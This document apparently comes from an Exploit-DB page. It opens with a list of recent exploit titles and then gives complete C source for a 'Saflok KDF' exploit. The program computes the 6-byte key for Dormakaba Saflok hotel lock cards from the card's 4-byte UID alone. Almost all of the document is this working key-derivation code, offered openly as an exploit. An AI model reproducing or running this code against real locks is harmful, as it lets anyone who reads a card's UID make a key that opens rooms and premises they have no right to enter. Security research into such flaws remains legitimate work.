
13 changes to exploits/shellcodes/ghdb Saflok - Key Derication Function Exploit (shellcode) Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes] Academy LMS 6.2 - Reflected XSS Blood Bank v1.0 - Multiple SQL Injection Moodle 4.3 - Reflected XSS TASKHUB-2.8.8 - XSS-Reflected WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - _Dashboard Redirect_ field Stored Cross-Site Scripting (XSS) WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection WP Rocket < 2.10.3 - Local File Inclusion (LFI)
// Exploit Title: Saflok KDF
// Date: 2023-10-29
// Exploit Author: a51199deefa2c2520cea24f746d899ce
// Vendor Homepage: https://www.dormakaba.com/
// Version: System 6000
// Tested on: Dormakaba Saflok cards
// CVE: N/A
#include <stdio.h>
#include <stdint.h>
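/* Sizes used by the key derivation in main(). */
enum {
    MAGIC_TABLE_SIZE = 192, /* 16 rows of 12 bytes in the constant table */
    KEY_LENGTH = 6,         /* bytes in the derived key */
    UID_LENGTH = 4          /* bytes in the card UID read from argv[1] */
};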
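/*
 * Derive the 6-byte Saflok key for the card UID given on the command line.
 *
 * argv[1] is read as four hexadecimal bytes (up to two hex digits each); any
 * characters after the fourth byte are ignored by the scan. The result is
 * printed as 12 uppercase hex digits after "Generated Key: ".
 *
 * Review note: the derivation takes only the 4-byte UID and the constant
 * table below as input. No secret or per-site value takes part, so the
 * output is reproducible by anyone who knows the UID.
 *
 * Returns 0 on success, 1 on a usage error or an unparsable UID.
 */
int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <32-bit uid value in hexadecimal format>\n", argv[0]);
        return 1;
    }

    /* 16 rows of 12 bytes; the derivation reads 6 consecutive bytes ending
     * at the last byte of the row selected by the low nibble of magic_byte. */
    static const uint8_t magic_table[MAGIC_TABLE_SIZE] = {
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xF0, 0x57, 0xB3, 0x9E, 0xE3, 0xD8,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x96, 0x9D, 0x95, 0x4A, 0xC1, 0x57,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x43, 0x58, 0x0D, 0x2C, 0x9D,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFF, 0xCC, 0xE0, 0x05, 0x0C, 0x43,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x34, 0x1B, 0x15, 0xA6, 0x90, 0xCC,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x89, 0x58, 0x56, 0x12, 0xE7, 0x1B,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xBB, 0x74, 0xB0, 0x95, 0x36, 0x58,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFB, 0x97, 0xF8, 0x4B, 0x5B, 0x74,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xC9, 0xD1, 0x88, 0x35, 0x9F, 0x92,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x92, 0xE9, 0x7F, 0x58, 0x97,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x16, 0x6C, 0xA2, 0xB0, 0x9F, 0xD1,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x27, 0xDD, 0x93, 0x10, 0x1C, 0x6C,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xDA, 0x3E, 0x3F, 0xD6, 0x49, 0xDD,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x58, 0xDD, 0xED, 0x07, 0x8E, 0x3E,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x5C, 0xD0, 0x05, 0xCF, 0xD9, 0x07,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x11, 0x8D, 0xD0, 0x01, 0x87, 0xD0
    };

    /* Without this check a short or non-hex argument would leave uid[]
     * partly uninitialized and the code below would read it. */
    uint8_t uid[UID_LENGTH];
    int parsed = sscanf(argv[1], "%2hhx%2hhx%2hhx%2hhx",
                        &uid[0], &uid[1], &uid[2], &uid[3]);
    if (parsed != UID_LENGTH) {
        fprintf(stderr, "Invalid UID: expected 8 hexadecimal digits\n");
        return 1;
    }

    /* At most 15 + 15 + 15 = 45, so the sum fits in a byte. */
    uint8_t magic_byte = (uint8_t)((uid[3] >> 4) + (uid[2] >> 4) + (uid[0] & 0x0F));

    /* Last byte of the selected row: between 11 and 191. The loop below
     * steps it down six times, so it stays inside magic_table and never
     * wraps; the original "index >= 0" test on an unsigned byte was always
     * true and has been dropped. */
    size_t table_index = (size_t)(magic_byte & 0x0F) * 12 + 11;

    uint8_t key[KEY_LENGTH] = {magic_byte, uid[0], uid[1], uid[2], uid[3], magic_byte};
    uint8_t carry_sum = 0;

    /* Byte-wise addition of the key and the table row, last byte first.
     * The carry of each byte sum is added into the next (more significant)
     * byte; overflow from adding that carry is discarded, exactly as in the
     * original arithmetic. */
    for (int i = KEY_LENGTH - 1; i >= 0; i--, table_index--) {
        uint16_t keysum = (uint16_t)(key[i] + magic_table[table_index]);
        key[i] = (uint8_t)((keysum & 0xFF) + carry_sum);
        carry_sum = (uint8_t)(keysum >> 8);
    }

    printf("Generated Key: ");
    for (int i = 0; i < KEY_LENGTH; i++) {
        printf("%02X", key[i]);
    }
    printf("\n");

    return 0;
}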